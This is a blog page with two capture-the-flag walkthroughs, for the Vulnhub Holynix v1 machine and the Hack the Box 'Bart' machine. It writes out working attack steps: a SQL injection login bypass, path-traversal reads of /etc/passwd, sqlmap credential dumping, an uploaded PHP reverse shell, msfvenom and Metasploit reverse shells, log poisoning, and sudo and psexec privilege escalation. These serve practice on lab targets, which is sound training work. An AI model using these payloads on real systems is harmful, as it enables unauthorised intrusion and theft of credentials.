Hack the Holynix: v1 (Boot 2 Root Challenge)

at 10:42 AM Friday, August 3, 2018 0 comments

Hello friends! Today we are going to take another CTF challenge known as Holynix 1 and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/holynix-v1,20/
Penetrating Methodologies
  • Network Scanning (Nmap, netdiscover)
  • Surfing HTTP service port (80)
  • Exploit LFI/RFI Vulnerability
  • SQLMAP Scanning
  • Extract databases and user credentials
  • Login into the website with a specific user
  • Upload and execute a Reverse shell
  • Reverse connection (Netcat)
  • Exploiting target with SUDO binaries
  • Get the Root access
WalkThrough
Let’s start off with scanning the network to find our target.




We found our target –> 192.168.1.105
Our next step is to scan our target with NMAP.
nmap –p- -A 192.168.1.105




Result shows us that there is only port 80(http) opened
When we tried to login to the URL with some random username and password (Eg:admin/admin) it gave us an error . Upon further enumeration we found out that this is subjected to SQL injection error.




This appears to be a basic SQL query. We should now be able to execute the command to bypass the login using the or 1=1 technique
Username = ' or 1=1 #
Password = ' or 1=1 #




Once logged in, we noticed that actually we are inside the user Alamo’s login page. After having a look at different pages, we navigated to the Upload page and tried to upload the php-reverse-shell.php file




Upon trying to upload the file php-reverse-shell.php, we got the below notification .It seems the user Alamo, being a restricted user; doesn’t have permission to upload the file.




We ran nikto to find out more details of the URL and observed that there could be a LFI/RFI vulnerability associated with the same
nikto –h http://192.168.1.105




We need to see what information is being passed upon from the user to the web server .Let’s trigger the Burpsuite and try uploading a file again, and observe what is actually happening.
First open the URL, select the Email from the dropdown and click on the Display File page




The parameter being passed in the POST request is text_file_name=ssp%2Femail.txt&B=Display+File as seen from the Burpsuite screenshot below




As we are aware that there is a LFI/RFI vulnerability on this website .Therefore let’s try to modify the parameter being passed in the POST request of Burpsuite as follows text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File




Once we change the content of the file (as shown above) in Burpsuite , click on Forward tab and the website page will display all the contents of the /etc/passwd file




As we have got entire list of users, let’s choose any one random user first and run SQLMAP with following command, so as to find out other details
To begin with, we are taking the user etenenbaum as an example :
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch




We got the list of all databases!! Now we tried using creds database, with the following command to extract other users’ details
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch




We were able to login into the website with user etenenbaum and corresponding password (as displayed above) .The next step is to setup netcat listener on Kali machine. Upon uploading the shell script, the file got uploaded successfully; however when we executed the file there was no output on the Netcat listener reverse shell and the browser returned an error .
Here we got a clue from the website’s upload page that there is an option “Enable the automatic extraction of gzip archives”. This made us believe to try to upload the file this time , in the zip format
Below is the command to tar and zip the reverse shell file shell.php
tar -zcvf shell.tar.gz shell.php




Click on Browse and select the file shell.tar.gz from the Kali Desktop machine. Click on the option “Enable the automatic extraction of gzip archives” and then upload the file.




We now need to locate the path of the file we just uploaded, as the actual objective is to upload a PHP reverse shell script and then execute it. We navigated to many places however were not able to find our recently uploaded file . We also checked the ‘Upload’ directory (http://192.168.1.105/upload) however got no success.
It striked us suddenly about the statement displayed on the upload page which says “Home directory uploader” .Hence it may be possible that it could be uploading files to users’ home directory.
Appended the subdirectory /~etenenbaum/ and browsed URL http://192.168.1.105/~etenenbaum/ and now we were able to see our uploaded file!!




We initiated the netcat listener on the Kali machine .Upon executing the file shell.php (as shown in the browser), we got the limited shell access
nc –lvp 1234




Now let’s perform further enumeration and try to escalate privileges.
Upon running the sudo command , we can see that there are multiple commands that will allow user www-data to sudo as root.
sudo –l
Navigate to the /tmp directory
cd /tmp/  

Copy the /bin/bash file to the /tmp folder

cp /bin/bash .

Change the ownership of the file  /tmp/bash , so that henceforth root is the owner

sudo chown root:root /tmp/bash

Backup the existing /bin/tar file to the bin/tar.bak
sudo mv /bin/tar /bin/tar.bak

Now move the /tmp/bash file to /bin/tar

sudo mv /tmp/bash /bin/tar

Execute the command /bin/tar (which is ideally running /bin/bash)
sudo /bin/tar

Finally run the id command to confirm the same
id

Hurray!! We got the root access



Labels:

Hack the Box: Bart Walkthrough

at 4:24 AM 0 comments

Hello friends!! Today we are going to solve another CTF challenge “Bart” which is available online for those who want to increase their skill in penetration testing and black box testing. Bart is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.81 so let’s begin with nmap port enumeration.
nmap -sV -p- 10.10.10.81
From given below image, you can observe we find only port 80 is open on target system.




As port 80 is running http, we open the IP address in our browser. As soon as we open the IP address we get redirected to “forum.bart.htb”.




Since htb doesn’t have global DNS, we aren’t going to be able to resolve the site. So we add a DNS entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb.



When we open forum.bart.htb, we find a website that has been built on wordpress.



When we open bart.htb it redirects us to forum.bart.htb. We enumerate directories for both domains and find a directory called “/monitor” for domain bart.htb.
dirb http://bart.htb/




When we open /monitor directory given by dirb scan and find a login page.



We use burpsuite to brute force the login page using /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvery:potter.




We login using these credentials and get redirected to a different domain called monitor.bart.htb




We add the domain name monitor.bart.htb in /etc/hosts file.




Now when we refresh the page we get a page for server monitoring.



Going through the page we find a link to a site and a domain we need to add to /etc/hosts.


We add internal-01.bart.htb we found earlier on the site to /etc/hosts.




We now open internal-01.bart.htb and find a login form.
We capture the login request using burpsuite and modify the request by changing login.php to register.php.
Then we login using the credentials we use to register and find a chat box.



We find a link to an open log, it looks like it may be vulnerable to LFI.
We were not able to access any system file but we were able to access log.php and find access logs.


Now we use log poisoning to get reverse shell. We change the user-agent to run whoami command, when we run the command we get the user name.


We were not able to run command injection, so we first create a reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe


After creating our shell, we upload the payload to the target machine using powershell. First we setup our HTTP server using python.
python -m SimpleHTTPServer 80


We setup our listener using metasploit before executing the target machine.

msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.6
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run


We now execute the payload using log poisoning.


As soon as we execute the payload we get our reverse shell.


After we get the reverse shell we find that the system is 64-bit architecture so we change the payload type to 64-bit architecture.

msf > use windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6
msf exploit(windows/local/payload_inject) > set lport 1234
msf exploit(windows/local/payload_inject) > set session 1
msf exploit(windows/local/payload_inject) > run


After running the exploit, we get a 64-bit meterpreter shell. Now we can run post modules properly as 32-bit meterpreter was running into problems.


We use autologin post module to find the the password for Administrator user.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set session 2
msf post(windows/gather/credentials/windows_autologin) > run


Now enumerating the target machine, we find that port 445 is running internally. So we use port forwarding so that we can use our machine to connect with it.
meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81


Now we use impacket-smbserver to create a smb server in our machine. So that we can share our payload with the target machine.

impacket-smbserver hack /root


Now the the session we had earlier died so port 4444 is free. So we are going to use that payload to get our reverse shell. First we run metasploit in a new tab and setup our listener.
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run


msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe
msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1
msf auxiliary(admin/smb/psexec_command) > set rport 443
msf auxiliary(admin/smb/psexec_command) > run


As soon as we run psexec auxiliary we get reverse shell with as administrator.


In c:\Users\Administrator\Desktop we find a file called root.txt, when we open it and find our first flag.


Enumerating the system in c:\Users\h.potter we find a file called user.txt. When we take a look at the content of the file we get our second flag.

Labels:
Subscribe to: Posts (Atom)